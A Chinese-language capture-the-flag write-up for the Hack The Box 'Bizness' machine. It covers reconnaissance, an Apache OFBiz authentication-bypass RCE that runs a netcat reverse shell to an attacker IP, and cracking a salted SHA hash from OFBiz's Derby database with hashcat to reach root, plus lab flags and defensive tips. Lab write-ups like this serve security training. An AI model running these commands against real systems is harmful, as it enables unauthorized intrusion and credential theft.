[Meachines][Easy]Bizness
字数 832 2025-08-18 11:38:32

Apache OFBiz 未授权RCE漏洞利用与提权教学文档

1. 目标识别与信息收集

1.1 端口扫描

使用nmap进行快速端口扫描:

nmap -p- 10.10.11.252 --min-rate 1000

1.2 Web目录扫描

使用dirsearch进行目录扫描:

dirsearch -u https://bizness.htb/

1.3 Web技术识别

使用whatweb识别网站技术:

whatweb https://bizness.htb/control/login

2. 漏洞发现与利用

2.1 漏洞识别

发现目标系统运行Apache OFBiz,存在未授权RCE漏洞

2.2 漏洞利用步骤

  1. 下载漏洞利用脚本:
git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass.git
cd Apache-OFBiz-Authentication-Bypass/
  1. 执行漏洞利用(反弹shell):
python3 exploit.py --url https://bizness.htb/ --cmd 'nc -c bash 10.10.16.23 10032'

3. 权限提升与后渗透

3.1 获取用户flag

cat /home/ofbiz/user.txt

用户flag:4f868ad44d8eb00d2d7d094bd5279de0

3.2 数据库文件分析

发现数据库文件包含密码哈希:

cat /opt/ofbiz/runtime/data/derby/ofbiz/seg0/c54d0.dat

3.3 密码哈希破解

  1. 哈希格式分析:
b8fd3f41a541a435857a8f3e751cc3a91c174362:d
$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I
  1. 哈希结构说明:
  • $SHA$:指示使用SHA哈希算法
  • d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I:哈希值部分,其中d$可能是盐值
  1. 使用hashcat破解:
hashcat -m 120 -a 0 -d 1 "b8fd3f41a541a435857a8f3e751cc3a91c174362:d" /usr/share/wordlists/rockyou.txt

3.4 获取root flag

cat /root/root.txt

root flag:8c72dd83a893d66bef258dc1c43eb2e4

4. 技术要点总结

  1. Apache OFBiz漏洞:该漏洞允许未经身份验证的远程代码执行,属于高危漏洞

  2. 哈希破解技巧

    • 需要先进行base64解码
    • 转换为十六进制字符串后使用hashcat破解
    • 注意识别哈希算法和盐值结构
  3. 后渗透路径

    • 通过数据库文件查找敏感信息
    • 利用密码哈希破解实现权限提升
  4. 防御建议

    • 及时更新Apache OFBiz到最新版本
    • 实施严格的访问控制
    • 监控异常登录和文件访问行为
    • 使用强密码策略防止哈希破解

5. 参考资源

  1. Apache OFBiz官方安全公告
  2. Hashcat官方文档(模式120对应SHA1加盐哈希)
  3. OFBiz认证绕过漏洞利用脚本:https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass
Apache OFBiz 未授权RCE漏洞利用与提权教学文档 1. 目标识别与信息收集 1.1 端口扫描 使用nmap进行快速端口扫描: 1.2 Web目录扫描 使用dirsearch进行目录扫描: 1.3 Web技术识别 使用whatweb识别网站技术: 2. 漏洞发现与利用 2.1 漏洞识别 发现目标系统运行Apache OFBiz,存在未授权RCE漏洞 2.2 漏洞利用步骤 下载漏洞利用脚本: 执行漏洞利用(反弹shell): 3. 权限提升与后渗透 3.1 获取用户flag 用户flag: 4f868ad44d8eb00d2d7d094bd5279de0 3.2 数据库文件分析 发现数据库文件包含密码哈希: 3.3 密码哈希破解 哈希格式分析: 哈希结构说明: $SHA$ :指示使用SHA哈希算法 d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I :哈希值部分,其中 d$ 可能是盐值 使用hashcat破解: 3.4 获取root flag root flag: 8c72dd83a893d66bef258dc1c43eb2e4 4. 技术要点总结 Apache OFBiz漏洞 :该漏洞允许未经身份验证的远程代码执行,属于高危漏洞 哈希破解技巧 : 需要先进行base64解码 转换为十六进制字符串后使用hashcat破解 注意识别哈希算法和盐值结构 后渗透路径 : 通过数据库文件查找敏感信息 利用密码哈希破解实现权限提升 防御建议 : 及时更新Apache OFBiz到最新版本 实施严格的访问控制 监控异常登录和文件访问行为 使用强密码策略防止哈希破解 5. 参考资源 Apache OFBiz官方安全公告 Hashcat官方文档(模式120对应SHA1加盐哈希) OFBiz认证绕过漏洞利用脚本:https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass